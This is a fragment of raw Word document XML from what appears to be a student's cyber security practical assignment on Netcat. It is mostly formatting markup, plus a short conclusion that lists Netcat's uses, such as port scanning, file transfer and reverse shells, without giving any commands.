        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FA09CA3" w14:textId="77777777" w:rsidR="000D5AC4" w:rsidRPr="000D5AC4" w:rsidRDefault="00CF6D48" w:rsidP="000D5AC4">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:overflowPunct w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:right="-79"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:pict w14:anchorId="17A22562">
          <v:rect id="_x0000_i1043" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FA5E904" w14:textId="77777777" w:rsidR="000D5AC4" w:rsidRPr="000D5AC4" w:rsidRDefault="000D5AC4" w:rsidP="000D5AC4">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:overflowPunct w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:right="-79"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D5AC4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AE90316" w14:textId="77777777" w:rsidR="000D5AC4" w:rsidRPr="000D5AC4" w:rsidRDefault="000D5AC4" w:rsidP="000D5AC4">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:overflowPunct w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:right="-79"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D5AC4">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Netcat (nc) is a versatile and powerful tool for network communication and troubleshooting. By using its various functionalities, you can perform tasks like scanning ports, transferring files, banner grabbing, and even setting up simple servers or reverse shells. Understanding the commands in this assignment will help you become proficient in using Netcat for network diagnostics and security assessments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="459C6851" w14:textId="77777777" w:rsidR="000D5AC4" w:rsidRPr="000D5AC4" w:rsidRDefault="000D5AC4" w:rsidP="0032127F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:overflowPunct w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:right="-79"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26B11FAE" w14:textId="3C69226B"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  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6950460F" w14:textId="0B41AA12" w:rsidR="008805C4" w:rsidRPr="00F248E3" w:rsidRDefault="008805C4" w:rsidP="008805C4">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="008805C4" w:rsidRPr="00F248E3" w:rsidSect="00810471">
      <w:headerReference w:type="even" r:id="rId28"/>
      <w:headerReference w:type="default" r:id="rId29"/>
      <w:footerReference w:type="even" r:id="rId30"/>
      <w:footerReference w:type="default" r:id="rId31"/>
      <w:headerReference w:type="first" r:id="rId32"/>
      <w:footerReference w:type="first" r:id="rId33"/>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52CEF" w14:textId="77777777" w:rsidR="00CF6D48" w:rsidRDefault="00CF6D48" w:rsidP="000C4449">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="067AB57B" w14:textId="77777777" w:rsidR="00CF6D48" w:rsidRDefault="00CF6D48"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27C4A" w14:textId="77777777" w:rsidR="0050067C" w:rsidRDefault="00500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045E2D" w:rsidRPr="00045E2D">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526275EA" w:rsidR="000E5726" w:rsidRPr="00E77B47" w:rsidRDefault="000E5726" w:rsidP="008D06B9">
                    <w:pPr>
                      <w:jc w:val="center"/>
                      <w:rPr>
                        <w:b/>
                        <w:bCs/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:b/>
                        <w:bCs/>
                      </w:rPr>
                      <w:t xml:space="preserve">| </w:t>
                    </w:r>
                    <w:r w:rsidR="00DB7ABF">
                      <w:rPr>
                        <w:b/>
                        <w:bCs/>
                        <w:color w:val="FF0000"/>
                      </w:rPr>
                      <w:t>B.Tech. CSE</w:t>
                    </w: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4ECAA68C"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0067C">
                            <w:rPr>
                              <w:b/>
                              <w:bCs/>
                              <w:color w:val="FF0000"/>
                              <w:szCs w:val="20"/>
                            </w:rPr>
                            <w:t>22010101</w:t>
                          </w:r>
                          <w:r w:rsidR="00045E2D">
                            <w:rPr>
                              <w:b/>
                              <w:bCs/>
                              <w:color w:val="FF0000"/>
                              <w:szCs w:val="20"/>
                            </w:rPr>
                            <w:t>099</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4ECAA68C"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0067C">
                      <w:rPr>
                        <w:b/>
                        <w:bCs/>
                        <w:color w:val="FF0000"/>
                        <w:szCs w:val="20"/>
                      </w:rPr>
                      <w:t>22010101</w:t>
                    </w:r>
                    <w:r w:rsidR="00045E2D">
                      <w:rPr>
                        <w:b/>
                        <w:bCs/>
                        <w:color w:val="FF0000"/>
                        <w:szCs w:val="20"/>
                      </w:rPr>
                      <w:t>099</w:t>
                    </w:r>
                    <w:bookmarkStart w:id="1" w:name="_GoBack"/>
                    <w:bookmarkEnd w:id="1"/>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6A68" w14:textId="77777777" w:rsidR="0050067C" w:rsidRDefault="00500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A0568" w14:textId="77777777" w:rsidR="00CF6D48" w:rsidRDefault="00CF6D48" w:rsidP="000C4449">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="3831C013" w14:textId="77777777" w:rsidR="00CF6D48" w:rsidRDefault="00CF6D48"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B8658" w14:textId="77777777" w:rsidR="0050067C" w:rsidRDefault="00500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9A68" w14:textId="7D318A7A" w:rsidR="001B7765" w:rsidRPr="001B7765" w:rsidRDefault="002C78B7" w:rsidP="00DB7ABF">
    <w:pPr>
      <w:pStyle w:val="Heading1"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:noProof/>
        <w:sz w:val="24"/>
        <w:szCs w:val="24"/>
        <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
      </w:rPr>
      <w:drawing>
        <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251665408" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="709A68DF" wp14:editId="6EB62B45">
          <wp:simplePos x="0" y="0"/>
          <wp:positionH relativeFrom="column">
            <wp:posOffset>0</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="paragraph">
            <wp:posOffset>0</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97D3DE2" w:rsidR="000E5726" w:rsidRPr="009020DE" w:rsidRDefault="0032127F" w:rsidP="00DB7ABF">
    <w:pPr>
      <w:pStyle w:val="Heading1"/>
      <w:jc w:val="center"/>
      <w:rPr>
        <w:sz w:val="22"/>
        <w:szCs w:val="22"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidRPr="009020DE">
      <w:rPr>
        <w:sz w:val="22"/>
        <w:szCs w:val="22"/>
      </w:rPr>
      <w:t xml:space="preserve">Semester </w:t>
    </w:r>
    <w:r w:rsidR="009D2DFA" w:rsidRPr="009020DE">
      <w:rPr>
        <w:sz w:val="22"/>
        <w:szCs w:val="22"/>
      </w:rPr>
      <w:t>6</w:t>
    </w:r>
    <w:r w:rsidR="009D2DFA" w:rsidRPr="009020DE">
      <w:rPr>
        <w:sz w:val="22"/>
        <w:szCs w:val="22"/>
        <w:vertAlign w:val="superscript"/>
      </w:rPr>
      <w:t>th</w:t>
    </w:r>
    <w:r w:rsidR="009D2DFA" w:rsidRPr="009020DE">
      <w:rPr>
        <w:sz w:val="22"/>
        <w:szCs w:val="22"/>
      </w:rPr>
      <w:t xml:space="preserve"> </w:t>
    </w:r>
    <w:r w:rsidRPr="009020DE">
      <w:rPr>
        <w:sz w:val="22"/>
        <w:szCs w:val="22"/>
      </w:rPr>
      <w:t xml:space="preserve">| Practical Assignment | </w:t>
    </w:r>
    <w:r w:rsidR="00BF05ED">
      <w:rPr>
        <w:sz w:val="22"/>
        <w:szCs w:val="22"/>
      </w:rPr>
      <w:t>Cyber</w:t>
    </w:r>
    <w:r w:rsidR="009D2DFA" w:rsidRPr="009020DE">
      <w:rPr>
        <w:sz w:val="22"/>
        <w:szCs w:val="22"/>
      </w:rPr>
      <w:t xml:space="preserve"> Security</w:t>
    </w:r>
    <w:r w:rsidRPr="009020DE">
      <w:rPr>
        <w:sz w:val="22"/>
        <w:szCs w:val="22"/>
      </w:rPr>
      <w:t xml:space="preserve"> (</w:t>
    </w:r>
    <w:r w:rsidR="003925CD" w:rsidRPr="003925CD">
      <w:rPr>
        <w:sz w:val="22"/>
        <w:szCs w:val="22"/>
      </w:rPr>
      <w:t>2101CS632</w:t>
    </w:r>
    <w:r w:rsidRPr="009020DE">
      <w:rPr>
        <w:sz w:val="22"/>
        <w:szCs w:val="22"/>
      </w:rPr>
      <w:t>)</w:t>
    </w:r>
  </w:p>
  <w:p w14:paraId="066BCEC8" w14:textId="354F5983" w:rsidR="000E5726" w:rsidRDefault="00D907A0" w:rsidP="0032127F">
    <w:pPr>
      <w:pStyle w:val="Heading1"/>
      <w:jc w:val="cente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6B1CAE7" w:rsidR="000E5726" w:rsidRPr="00D907A0" w:rsidRDefault="00D907A0" w:rsidP="00D907A0">
    <w:pPr>
      <w:pStyle w:val="Heading1"/>
      <w:jc w:val="right"/>
      <w:rPr>
        <w:sz w:val="22"/>
        <w:szCs w:val="22"/>
      </w:rPr>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:sz w:val="22"/>
        <w:szCs w:val="22"/>
      </w:rPr>
      <w:t xml:space="preserve">Date:    </w:t>
    </w:r>
    <w:r w:rsidR="00332F2C">
      <w:rPr>
        <w:sz w:val="22"/>
        <w:szCs w:val="22"/>
      </w:rPr>
      <w:t>18</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:sz w:val="22"/>
        <w:szCs w:val="22"/>
      </w:rPr>
      <w:t>/</w:t>
    </w:r>
    <w:r w:rsidR="00117B16">
      <w:rPr>
        <w:sz w:val="22"/>
        <w:szCs w:val="22"/>
      </w:rPr>
      <w:t>12</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:sz w:val="22"/>
        <w:szCs w:val="22"/>
      </w:rPr>
      <w:t>/</w:t>
    </w:r>
    <w:r w:rsidR="00117B16">
      <w:rPr>
        <w:sz w:val="22"/>
        <w:szCs w:val="22"/>
      </w:rPr>
      <w:t>24</w:t>
    </w:r>
    <w:r>
      <w:rPr>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1C822" w14:textId="77777777" w:rsidR="0050067C" w:rsidRDefault="00500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805F8D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B9C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65AB5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="91447C2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3A23AE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0F4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A3F27"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E4E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615CFC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CF4C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8A22D3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="631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2E61A7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0284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555295"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E2380926"/>
    <w:lvl w:ilvl="0" w:tplc="0409000F">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="0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A1742"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E14A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A65137"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E4F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186ECF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9314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707DB9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E1F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3C152F2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CCD8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33BBE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="763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0"/>
  </w:num>
  <w:num w:numId="3">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="4">
    <w:abstractNumId w:val="45"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="29"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="42"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="35"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="12">
    <w:abstractNumId w:val="44"/>
  </w:num>
  <w:num w:numId="13">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="14">
    <w:abstractNumId w:val="38"/>
  </w:num>
  <w:num w:numId="15">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="16">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="17">
    <w:abstractNumId w:val="46"/>
  </w:num>
  <w:num w:numId="18">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="19">
    <w:abstractNumId w:val="28"/>
  </w:num>
  <w:num w:numId="20">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="21">
    <w:abstractNumId w:val="43"/>
  </w:num>
  <w:num w:numId="22">
    <w:abstractNumId w:val="33"/>
  </w:num>
  <w:num w:numId="23">
    <w:abstractNumId w:val="41"/>
  </w:num>
  <w:num w:numId="24">
    <w:abstractNumId w:val="34"/>
  </w:num>
  <w:num w:numId="25">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="26">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="27">
    <w:abstractNumId w:val="32"/>
  </w:num>
  <w:num w:numId="28">
    <w:abstractNumId w:val="39"/>
  </w:num>
  <w:num w:numId="29">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="30">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="31">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="32">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="33">
    <w:abstractNumId w:val="31"/>
  </w:num>
  <w:num w:numId="34">
    <w:abstractNumId w:val="26"/>
  </w:num>
  <w:num w:numId="35">
    <w:abstractNumId w:val="47"/>
  </w:num>
  <w:num w:numId="36">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="37">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="38">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="39">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="40">
    <w:abstractNumId w:val="30"/>
  </w:num>
  <w:num w:numId="41">
    <w:abstractNumId w:val="37"/>
  </w:num>
  <w:num w:numId="42">
    <w:abstractNumId w:val="36"/>
  </w:num>
  <w:num w:numId="43">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="44">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="45">
    <w:abstractNumId w:val="27"/>
  </w:num>
  <w:num w:numId="46">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="47">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="48">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46F6"/>
    <w:rsid w:val="0003605C"/>
    <w:rsid w:val="000366FD"/>
    <w:rsid w:val="00040260"/>
    <w:rsid w:val="00040AC1"/>
    <w:rsid w:val="00041B04"/>
    <w:rsid w:val="0004415B"/>
    <w:rsid w:val="000452EF"/>
    <w:rsid w:val="0004540A"/>
    <w:rsid w:val="00045554"/>
    <w:rsid w:val="00045E2D"/>
    <w:rsid w:val="00046542"/>
    <w:rsid w:val="000475B4"/>
    <w:rsid w:val="00050C4A"/>
    <w:rsid w:val="0005138C"/>
    <w:rsid w:val="00051DBA"/>
    <w:rsid w:val="00053A54"/>
    <w:rsid w:val="00056A05"/>
    <w:rsid w:val="00056F29"/>
    <w:rsid w:val="000571D9"/>
    <w:rsid w:val="00072211"/>
    <w:rsid w:val="00074505"/>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5AC4"/>
    <w:rsid w:val="000D6DA1"/>
    <w:rsid w:val="000D7501"/>
    <w:rsid w:val="000E2597"/>
    <w:rsid w:val="000E2B38"/>
    <w:rsid w:val="000E372C"/>
    <w:rsid w:val="000E3ECF"/>
    <w:rsid w:val="000E5726"/>
    <w:rsid w:val="000E66C8"/>
    <w:rsid w:val="000F1AD6"/>
    <w:rsid w:val="000F223E"/>
    <w:rsid w:val="000F3B60"/>
    <w:rsid w:val="000F4869"/>
    <w:rsid w:val="000F4F46"/>
    <w:rsid w:val="00100FE7"/>
    <w:rsid w:val="00102352"/>
    <w:rsid w:val="001052E1"/>
    <w:rsid w:val="00105849"/>
    <w:rsid w:val="0011229E"/>
    <w:rsid w:val="00113234"/>
    <w:rsid w:val="0011382C"/>
    <w:rsid w:val="0011422C"/>
    <w:rsid w:val="00117B16"/>
    <w:rsid w:val="00120AA5"/>
    <w:rsid w:val="001228F2"/>
    <w:rsid w:val="00122D5B"/>
    <w:rsid w:val="00135F9F"/>
    <w:rsid w:val="00135FE8"/>
    <w:rsid w:val="00136A39"/>
    <w:rsid w:val="00142DDF"/>
    <w:rsid w:val="00143124"/>
    <w:rsid w:val="001448E2"/>
    <w:rsid w:val="0014554B"/>
    <w:rsid w:val="00145A2C"/>
    <w:rsid w:val="0014745F"/>
    <w:rsid w:val="001503B7"/>
    <w:rsid w:val="00150BA9"/>
    <w:rsid w:val="00151A19"/>
    <w:rsid w:val="00152534"/>
    <w:rsid w:val="00155814"/>
    <w:rsid w:val="0015643D"/>
    <w:rsid w:val="00160840"/>
    <w:rsid w:val="00164EF3"/>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E5E9D"/>
    <w:rsid w:val="001E7B2E"/>
    <w:rsid w:val="001F4443"/>
    <w:rsid w:val="001F5C33"/>
    <w:rsid w:val="00202405"/>
    <w:rsid w:val="0020655B"/>
    <w:rsid w:val="00206FDA"/>
    <w:rsid w:val="00211209"/>
    <w:rsid w:val="0021306A"/>
    <w:rsid w:val="00217468"/>
    <w:rsid w:val="0022164B"/>
    <w:rsid w:val="002268A7"/>
    <w:rsid w:val="00236BB9"/>
    <w:rsid w:val="0023745A"/>
    <w:rsid w:val="002410A4"/>
    <w:rsid w:val="002431D9"/>
    <w:rsid w:val="00245865"/>
    <w:rsid w:val="00245BBF"/>
    <w:rsid w:val="0024613C"/>
    <w:rsid w:val="00246B91"/>
    <w:rsid w:val="00250073"/>
    <w:rsid w:val="00250EFF"/>
    <w:rsid w:val="0026205B"/>
    <w:rsid w:val="0026373A"/>
    <w:rsid w:val="00264650"/>
    <w:rsid w:val="00265F58"/>
    <w:rsid w:val="002702D6"/>
    <w:rsid w:val="0027062D"/>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C78B7"/>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32F2C"/>
    <w:rsid w:val="0034327F"/>
    <w:rsid w:val="003462F7"/>
    <w:rsid w:val="00352036"/>
    <w:rsid w:val="00354421"/>
    <w:rsid w:val="00360C36"/>
    <w:rsid w:val="00361916"/>
    <w:rsid w:val="0036526E"/>
    <w:rsid w:val="0036735C"/>
    <w:rsid w:val="003728A5"/>
    <w:rsid w:val="00372E2D"/>
    <w:rsid w:val="003753E4"/>
    <w:rsid w:val="00375FAA"/>
    <w:rsid w:val="00376311"/>
    <w:rsid w:val="0037719B"/>
    <w:rsid w:val="00385680"/>
    <w:rsid w:val="00387347"/>
    <w:rsid w:val="00391C4E"/>
    <w:rsid w:val="0039233D"/>
    <w:rsid w:val="003925C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4A57"/>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067C"/>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12D0"/>
    <w:rsid w:val="00593AC1"/>
    <w:rsid w:val="0059486B"/>
    <w:rsid w:val="005A0BDE"/>
    <w:rsid w:val="005A1809"/>
    <w:rsid w:val="005A60FD"/>
    <w:rsid w:val="005B00BD"/>
    <w:rsid w:val="005B37F8"/>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1B3"/>
    <w:rsid w:val="00654A3F"/>
    <w:rsid w:val="0066088F"/>
    <w:rsid w:val="00660E0C"/>
    <w:rsid w:val="0066243D"/>
    <w:rsid w:val="00662625"/>
    <w:rsid w:val="006631E9"/>
    <w:rsid w:val="00664035"/>
    <w:rsid w:val="00664950"/>
    <w:rsid w:val="00665798"/>
    <w:rsid w:val="006657E7"/>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A6203"/>
    <w:rsid w:val="006B0E32"/>
    <w:rsid w:val="006B4D7F"/>
    <w:rsid w:val="006B698D"/>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332B"/>
    <w:rsid w:val="00824662"/>
    <w:rsid w:val="0082500C"/>
    <w:rsid w:val="008269B0"/>
    <w:rsid w:val="008272A5"/>
    <w:rsid w:val="00827726"/>
    <w:rsid w:val="00827AE0"/>
    <w:rsid w:val="00831833"/>
    <w:rsid w:val="0084079C"/>
    <w:rsid w:val="008427ED"/>
    <w:rsid w:val="008443E2"/>
    <w:rsid w:val="00844544"/>
    <w:rsid w:val="00844858"/>
    <w:rsid w:val="008472F6"/>
    <w:rsid w:val="00851432"/>
    <w:rsid w:val="008539CB"/>
    <w:rsid w:val="00863036"/>
    <w:rsid w:val="00866BCC"/>
    <w:rsid w:val="0086797A"/>
    <w:rsid w:val="00870267"/>
    <w:rsid w:val="00872E92"/>
    <w:rsid w:val="00875127"/>
    <w:rsid w:val="00877E84"/>
    <w:rsid w:val="008805C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E6061"/>
    <w:rsid w:val="008F0811"/>
    <w:rsid w:val="008F4C1B"/>
    <w:rsid w:val="009020DE"/>
    <w:rsid w:val="009033A3"/>
    <w:rsid w:val="00904448"/>
    <w:rsid w:val="00911ADE"/>
    <w:rsid w:val="00911BB1"/>
    <w:rsid w:val="00914B7A"/>
    <w:rsid w:val="00916F2D"/>
    <w:rsid w:val="00917384"/>
    <w:rsid w:val="009176FA"/>
    <w:rsid w:val="00925113"/>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57BA5"/>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2DFA"/>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3835"/>
    <w:rsid w:val="00A84977"/>
    <w:rsid w:val="00A8656C"/>
    <w:rsid w:val="00A87668"/>
    <w:rsid w:val="00A9138C"/>
    <w:rsid w:val="00A91987"/>
    <w:rsid w:val="00A92072"/>
    <w:rsid w:val="00A954A5"/>
    <w:rsid w:val="00A957EF"/>
    <w:rsid w:val="00A95BDA"/>
    <w:rsid w:val="00A95CD0"/>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05ED"/>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0CA"/>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D4936"/>
    <w:rsid w:val="00CE0819"/>
    <w:rsid w:val="00CE10D7"/>
    <w:rsid w:val="00CE4B30"/>
    <w:rsid w:val="00CE5067"/>
    <w:rsid w:val="00CE588C"/>
    <w:rsid w:val="00CE7450"/>
    <w:rsid w:val="00CE79DF"/>
    <w:rsid w:val="00CF34DB"/>
    <w:rsid w:val="00CF47AB"/>
    <w:rsid w:val="00CF4B57"/>
    <w:rsid w:val="00CF6D48"/>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51B6"/>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26DD"/>
    <w:rsid w:val="00DB3B51"/>
    <w:rsid w:val="00DB61B6"/>
    <w:rsid w:val="00DB7198"/>
    <w:rsid w:val="00DB7643"/>
    <w:rsid w:val="00DB7ABF"/>
    <w:rsid w:val="00DC0864"/>
    <w:rsid w:val="00DC22AF"/>
    <w:rsid w:val="00DC2CA7"/>
    <w:rsid w:val="00DC418F"/>
    <w:rsid w:val="00DC7AAB"/>
    <w:rsid w:val="00DD44AE"/>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4D1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AFA"/>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09540057">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18055039">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1219127593">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="131380131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651523761">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27601273">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407535">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="635988422">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="172383203">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="1539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10663135">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="41293068">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="164706395">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
